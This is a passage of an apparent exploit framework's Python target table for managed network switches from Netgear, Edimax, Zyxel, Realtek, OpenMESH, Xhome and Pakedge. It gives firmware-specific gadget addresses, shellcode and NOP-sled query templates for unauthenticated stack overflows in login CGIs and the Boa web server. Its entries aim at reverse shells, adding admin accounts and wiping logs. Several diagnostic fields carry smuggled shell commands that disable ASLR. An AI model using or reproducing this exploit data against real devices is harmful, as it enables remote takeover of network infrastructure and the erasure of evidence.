# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'sys_timeSntpDel_set':0x426724,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
'sys_timeSettings_set':0x424D28,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable':False,
}, 

# Interesting when there is a fresh heap with 0x00's (4 x 0x00 == MIPS NOP),
# and to fill wider area with sending '&%8f%84%01=%8f%84%80%18' where:
# 
# NOP's
# '24%04%FF=' : '=' will be replaced with 0x00, li $a0, 0xFFFFFF00
# '%24%04%FF%FF' : li $a0, 0xFFFFFFFF
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
'query':'username='+ self.random_string(112) +'_RA_START&password='+ self.random_string(80) +'&login=1'+ ('&%24%04%FF=%24%04%FF%FF' * 50) +'_SHELLCODE',
'START':0x10010104,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP' :0x10600604,# end: You may want to play with this if you dont get it working
'usr_nop': 28,# NOP sled (shellcode will be tailed)
'pwd_nop': 20,# filler/garbage (not used for something constructive)
'align': 0,# Align opcodes in memory
'stack':False,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},

#
# Netgear inc.
#
# CGI Reverse Shell      : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log   : No (logging do not exist)
# Del /var/log/flash.log : No (logging do not exist)
# Del /mntlog/flash.log  : No (logging do not exist)
# Add credentials        : No (Single account only)
# Del credentials        : No (Single account only)
#
'609-31457': {
'template':'Netgear',# Static for the vendor
'model':'GS750E ProSAFE Plus Switch',
'uri':'https://www.netgear.com/support/product/gs750e.aspx',
'version':'1.0.0.22',# Version / binary dependent stuff
'login': {
'encryption':'caesar',
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'query':'{"_ds=1&password=PASSWORD&err_flag=0&err_msg=&submt=&_de=1":{}}',
},
'verify': { 
'set.cgi': {
'description':'Stack overflow in "password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&password=' + self.random_string(320) + '&err_flag=0&err_msg=&submt=&_de=1":{}}',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x4102F8,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f9984fc,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x24840c6c,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
'stack_cgi_log': {
'vulnerable': False,
},
#
# Interesting, by adding 0xc1c1c1c1 to START/STOP, remote end will decode to our original START/STOP (including 0x00) =]
#
'heack_cgi_shell': {
'description':'Stack overflow in "password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'cgi':'set.cgi',# /sqfs/home/web/cgi-bin/security.cgi; main()
'START':0x10001210,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x10006210,# end: You may want to play with this if you dont get it working
'usr_nop': 50,# NOP sled (shellcode will be tailed)
'pwd_nop': 79,# filler/garbage (not used for something constructive)
'align': 0,# Align opcodes in memory
'stack':False,# NOP and shellcode lays on: True = stack, False = Heap
'query':'{"_ds=1&password=' + self.random_string(316) + '_RA_START&shellcode=_USRNOP_SHELLCODE&_de=1":{}}',
'workaround':False,# My LAB workaround
'vulnerable': True,
'safe': True



},
},
},

#
# Netgear inc.
#
# Note: 
# 'username' is vulnerable for stack overflow
# 'pwd' use 'encode()' and not vulnerable for stack overflow (so we cannot jump with 'buffer method'...)
# Boa/Hydra 'getFdStr()' loop modified, original xploit dont work (0x00 are now ok), weird 'solution' to have $t9 loaded with JMP in 'fwrite()'
# 'hash=<MD5>' tailing all URI's
#
# CGI Reverse Shell      : No
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log   : No
# Del /var/log/flash.log : No
# Del /mntlog/flash.log  : No
# Add credentials        : No
# Del credentials        : No
#
'639-98866': {
'template':'Netgear',# Static for the vendor
'model':'GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP',
'uri':'https://kb.netgear.com/000060184/GS728TPv2-GS728TPPv2-GS752TPv2-GS752TPP-Firmware-Version-6-0-0-45',
'version':'6.0.0.45',# Version / binary dependent stuff
'info_leak':False,
'hash_uri':True,# tailed 'hash=' md5 hashed URI as csrf token
'login': {
'encryption':'encode',
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'query':'{"_ds=1&username=USERNAME&pwd=PASSWORD&err_flag=0&err_msg=&submt=&_de=1":{}}',
},
'verify': { 
'set.cgi': {
'description':'Stack overflow in "username" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(100) +'&pwd=NOP&err_flag=0&err_msg=&submt=&_de=1":{}}',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
# 
'gadget': 0x45678C,# Direct heap address for NOP slep and shellcode
# /sqfs/bin/boa; read_body(); 
'system': 0x8f99853c,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x2484ae5c,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 6,# Should leave as-is (but you can play between 5 - 8)
'safe': False
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
},
},

'639-73124': {
'template':'Netgear',# Static for the vendor
'model':'GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP',
'uri':'https://www.netgear.com/support/product/GS752TPv2#Firmware%20Version%206.0.0.37',
'version':'6.0.0.37',# Version / binary dependent stuff
'info_leak':False,
'hash_uri':True,# tailed 'hash=' md5 hashed URI as csrf token
'login': {
'encryption':'encode',
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'query':'{"_ds=1&username=USERNAME&pwd=PASSWORD&err_flag=0&err_msg=&submt=&_de=1":{}}',
},
'verify': { 
'set.cgi': {
'description':'Stack overflow in "username" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(100) +'&pwd=NOP&err_flag=0&err_msg=&submt=&_de=1":{}}',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
# 
'gadget': 0x45778C,# Direct heap address for NOP slep and shellcode
# /sqfs/bin/boa; read_body(); 
'system': 0x8f998538,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x2484afec,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 6,# Should leave as-is (but you can play between 5 - 8)
'safe': False
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
},
},

#
# EdimaxPRO
#
# CGI Reverse Shell      : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log   : Yes
# Del /var/log/flash.log : Yes
# Del /mntlog/flash.log  : Yes
# Add credentials        : Yes
# Del credentials        : Yes
#
'225-63242': {
'template':'Edimax',# Static for the vendor
'model':'GS-5424PLC',
'uri':'https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/smb_switches_poe/gs-5424plc',
'version':'1.1.1.5',# Version / binary dependent stuff
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40E6DC,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f998524,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x248411bc,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
'stack_cgi_diag': {
# /sqfs/home/web/cgi/set.cgi;  cgi_diag_traceroute_set()
# traceroute
'web_sys_ping_post':0x40DFF4,# Jump one after 'sw $ra'# (address, binary dependent)
'sys_ping_post_cmd':'&srvHost=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',
'sys_ping_post_check':'',

'verify_uri':'/tmp/check',
'vulnerable': True,# 
},
'stack_cgi_log': {
# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()
'log_settings_set':0x41D99C,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
'log_ramClear':0x41D8E4,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
'log_fileClear':0x41D8E4,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
'sys_timeSntp_set':0x41620C,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
'sys_timeSntpDel_set':0x41620C,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
'sys_timeSettings_set':0x41620C,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': False,# Not clear, may be to long URI for the stack
}, 
'heack_cgi_shell': {
'cgi':'set.cgi',# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
'START':0x7ffeff04,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x7fc60000,# end: You may want to play with this if you dont get it working
'usr_nop': 64,# NOP sled (shellcode will be tailed)
'pwd_nop': 77,# filler/garbage (not used for something constructive)
'align': 3,# Align opcodes in memory
'stack':True,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},
'225-96283': {
'template':'Edimax',# Static for the vendor
'model':'GS-5424PLC',
'uri':'https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/smb_switches_poe/gs-5424plc',
'version':'1.1.1.6',# Version / binary dependent stuff
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40E6DC,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f998524,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x248411ac,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,# 
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
'stack_cgi_diag': {
# /sqfs/home/web/cgi/set.cgi;  cgi_diag_traceroute_set()
# traceroute
'web_sys_ping_post':0x40E024,# Jump one after 'sw $ra'# (address, binary dependent)
'sys_ping_post_cmd':'&srvHost=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',
'sys_ping_post_check':'',

'verify_uri':'/tmp/check',
'vulnerable': True,# 
},
'stack_cgi_log': {
# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()
'log_settings_set':0x41D9EC,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
'log_ramClear':0x41D934,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
'log_fileClear':0x41D934,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,# 
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
'sys_timeSntp_set':0x416254,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
'sys_timeSntpDel_set':0x416254,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
'sys_timeSettings_set':0x416254,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
}, 
'heack_cgi_shell': {
'cgi':'set.cgi',# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
'START':0x7ffeff04,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x7fc60000,# end: You may want to play with this if you dont get it working
'usr_nop': 64,# NOP sled (shellcode will be tailed)
'pwd_nop': 77,# filler/garbage (not used for something constructive)
'align': 3,# Align opcodes in memory
'stack':True,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,# 
},
},
},

#
# Zyxel
#
# CGI Reverse Shell      : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log   : Yes
# Del /var/log/flash.log : No
# Del /mntlog/flash.log  : No
# Add credentials        : Yes (adding username to next free index number, may not be #1)
# Del credentials        : Yes (index number instead of username, may not be #1)
#
'222-71560': {
'template':'Zyxel',# Static for the vendor
'version':'2.40_AAHL.1_20180705',# Version / binary dependent stuff
'model':'GS1900-24',# Model
'uri':'https://www.zyxel.com/products_services/8-10-16-24-48-port-GbE-Smart-Managed-Switch-GS1900-Series/',
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40D60C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f998520,# la $t9, system) # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x2484e148,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,# 
},
#
#
'stack_cgi_diag': {# Not vulnerable
'address':0x4341C4,
'vulnerable': False,
},
'stack_cgi_add_account': {
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_localUser_post()
'address':0x436D9C,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&usrName=USERNAME&usrPrivType=15&usrPriv=15',# Admin, priv 15
'vulnerable': True,
},
'stack_cgi_del_account': { #
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_localUserDel_post()
'address':0x437124,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&_del=1',# First additional user in the list
'vulnerable': True,# user
},
'stack_cgi_log': {
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()
'log_settings_set':0x47D760,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_delete_post()
'log_ramClear':0x480804,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_delete_post()
'log_fileClear':0x480804,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,# 
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'sys_timeSntp_set':0x43BA8C,# Jump one after 'sw $ra'# Set SNTP Server (Inject CMD)
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'sys_timeSntpDel_set':0x43BA8C,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
'sys_timeSettings_set':0x43AF54,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable':False,
}, 
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
'query':'username='+ self.random_string(100) +'_RA_START&password='+ self.random_string(59) +'&STARTUP_BACKUP=1'+ (('&' + struct.pack('>L',0x2404FF3D) + struct.pack('>L',0x2404FFFF)) * 70) + '&' + struct.pack('>L',0x2404FF3D) +'_SHELLCODE',
'START':0x10010104,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP': 0x104006A0,# end: You may want to play with this if you dont get it working
'usr_nop': 25,# NOP sled (shellcode will be tailed)
'pwd_nop': 15,# filler/garbage (not used for something constructive)
'align': 0,# Align opcodes in memory
'stack':False,# NOP and shellcode lays on: True = stack, False = Heap
},
},
},

#
# Realtek
#
# CGI Reverse Shell      : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log   : Yes
# Del /var/log/flash.log : No
# Del /mntlog/flash.log  : No
# Add credentials        : Yes
# Del credentials        : Yes
#
'222-40570': {
'template':'Realtek',# Static for the vendor
'version':'3.0.0.43126',# Version / binary dependent stuff
'model':'RTL8380-24GE-4GEC',# Model
'uri':'https://www.realtek.com/en/products/communications-network-ics/item/rtl8381m-vb-cg-2',
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40E6DC,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f99851c,# la $t9, system) # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x24841ea8,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
'stack_cgi_diag': {
# Ping IPv4
'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&count=1',
'verify_uri':'/tmp/pingtest_tmp',
'web_sys_ping_post':0x422980,# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_ping_post()

# traceroute
#'web_sys_ping_post':0x423168,# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_trace_route_post()
#'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/traceroute_tmp #&tr_maxhop=30&count=1',
#'verify_uri':'/tmp/traceroute_tmp',
'vulnerable': True,
},
'stack_cgi_log': {
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()
'log_settings_set':0x481968,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
'log_ramClear':0x4847DC,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
'log_fileClear':0x4847DC,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'stack_cgi_sntp': {
'sys_timeSntp_set':0x42C8F0,# Jump one after 'sw $ra'# Set SNTP Server (Inject CMD)
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'sys_timeSntpDel_set':0x42C8F0,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
'sys_timeSettings_set':0x42C8F0,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
}, 
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
'query':'username=_USRNOP&password=_PWDNOP_RA_START&login=1&_USRNOP_USRNOP_SHELLCODE',
'START':0x7fff7004,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x7fc60000,# end: You may want to play with this if you dont get it working
'usr_nop': 28,# NOP sled (shellcode will be tailed)
'pwd_nop': 20,# filler/garbage (not used for something constructive)
'align': 0,# Align opcodes in memory
'stack':True,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},

#
# OpenMESH (some identical with enginius egs series)
#
# CGI Reverse Shell      : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log   : Yes
# Del /var/log/flash.log : Yes
# Del /mntlog/flash.log  : Yes
# Add credentials        : Yes
# Del credentials        : Yes
#
'13984-12788': {
'template':'OpenMESH',# Static for the vendor
'version':'01.03.24_180823-1626',# Version / binary dependent stuff
'model':'OMS24',# Model
'uri':'https://www.openmesh.com/',
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40E12C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f99851c,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x248405a0,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_add_account': {
# /sqfs/home/web/cgi/set.cgi;  cgi_sys_acctAdd_set()
'address':0x424890,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&na=USERNAME&pw=PASSWORD&pv=0&op=1&',# Admin, priv 15
'vulnerable': True,
},
'stack_cgi_del_account': {
# /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()
'address':0x424890,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&na=USERNAME&pw=&pv=0&op=0',# 
'vulnerable': True,# user
},
'stack_cgi_diag': {
# /sqfs/home/web/cgi-bin/datajson.cgi;  sn_ipv4PingSet()
#'web_sys_ping_post':0x42341C,# Jump one after 'sw $ra'# (address, binary dependent)

# /sqfs/home/web/cgi-bin/datajson.cgi;  sn_tracertSet()
'sys_ping_post_cmd':'&ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space #&mh=30&uid=0',
'sys_ping_post_check':'&ip=127.0.0.1 ; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',
'verify_uri':'/conf_tmp/check',
'web_sys_ping_post': 0x424248,# Jump one after 'sw $ra'# (address, binary dependent)
'vulnerable': True,# 
},
'stack_cgi_log': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()
'log_settings_set':0x43EA88,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
'log_ramClear':0x440660,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
'log_fileClear':0x440660,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
'sys_timeSntp_set':0x425260,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
'sys_timeSntpDel_set':0x425260,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
'sys_timeSettings_set':0x425260,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
}, 
'heack_cgi_shell': {
'cgi':'security.cgi',# /sqfs/home/web/cgi-bin/security.cgi; main()
'START':0x100181A0,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x104006A0,# end: You may want to play with this if you dont get it working
'usr_nop': 987,# NOP sled (shellcode will be tailed)
'pwd_nop': 69,# filler/garbage (not used for something constructive)
'align': 0,# Align opcodes in memory
'stack':False,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},

#
# Xhome (identical with Realtek)
#
# CGI Reverse Shell      : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log   : Yes
# Del /var/log/flash.log : No
# Del /mntlog/flash.log  : No
# Add credentials        : Yes
# Del credentials        : Yes
#
'222-64895': {
'template':'Xhome',# Static for the vendor
'version':'3.0.0.43126',# Version / binary dependent stuff
'model':'DownLoop-G24M',# Model
'uri':'http://www.xhome.com.tw/product_info.php?info=p116_XHome-DownLoop-G24M----------------------------------------.html',
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40E6DC,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f99851c,# la $t9, system) # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x24841ea8,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
'stack_cgi_diag': {
# Ping IPv4
'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&count=1',
'verify_uri':'/tmp/pingtest_tmp',
'web_sys_ping_post':0x4229A0,# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_ping_post()

# traceroute
#'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/traceroute_tmp #&tr_maxhop=30&count=1',
#'verify_uri':'/tmp/traceroute_tmp',
#'web_sys_ping_post':0x423188,# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_trace_route_post()
'vulnerable': True,
},
'stack_cgi_log': {
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()
'log_settings_set':0x481988,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
'log_ramClear':0x4847FC,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
'log_fileClear':0x4847FC,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'stack_cgi_sntp': {
'sys_timeSntp_set':0x42C910,# Jump one after 'sw $ra'# Set SNTP Server (Inject CMD)
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'sys_timeSntpDel_set':0x42C910,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
'sys_timeSettings_set':0x42B6F8,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
}, 
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
'query':'username=_USRNOP&password=_PWDNOP_RA_START&login=1&_USRNOP_USRNOP_SHELLCODE',
'START':0x7fff7004,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x7fc60000,# end: You may want to play with this if you dont get it working
'usr_nop': 28,# NOP sled (shellcode will be tailed)
'pwd_nop': 20,# filler/garbage (not used for something constructive)
'align': 0,# Align opcodes in memory
'stack':True,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},

#
# Pakedgedevice & Software
#
# CGI Reverse Shell      : Yes
# Boa/Hydra reverse shell: No (cannot point JMP correct into NOP on heap)
# Del /var/log/ram.log   : Yes
# Del /var/log/flash.log : Yes
# Del /mntlog/flash.log  : Yes
# Add credentials        : Yes
# Del credentials        : Yes
#
'225-21785': {
'model':'SX-8P',
'template':'Pakedge',# Static for the vendor
'version':'1.04',# Version / binary dependent stuff
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40C86C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f998538,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x248492ec,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
'stack_cgi_log': {
# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()
'log_settings_set':0x413AEC,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
'log_ramClear':0x413A14,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
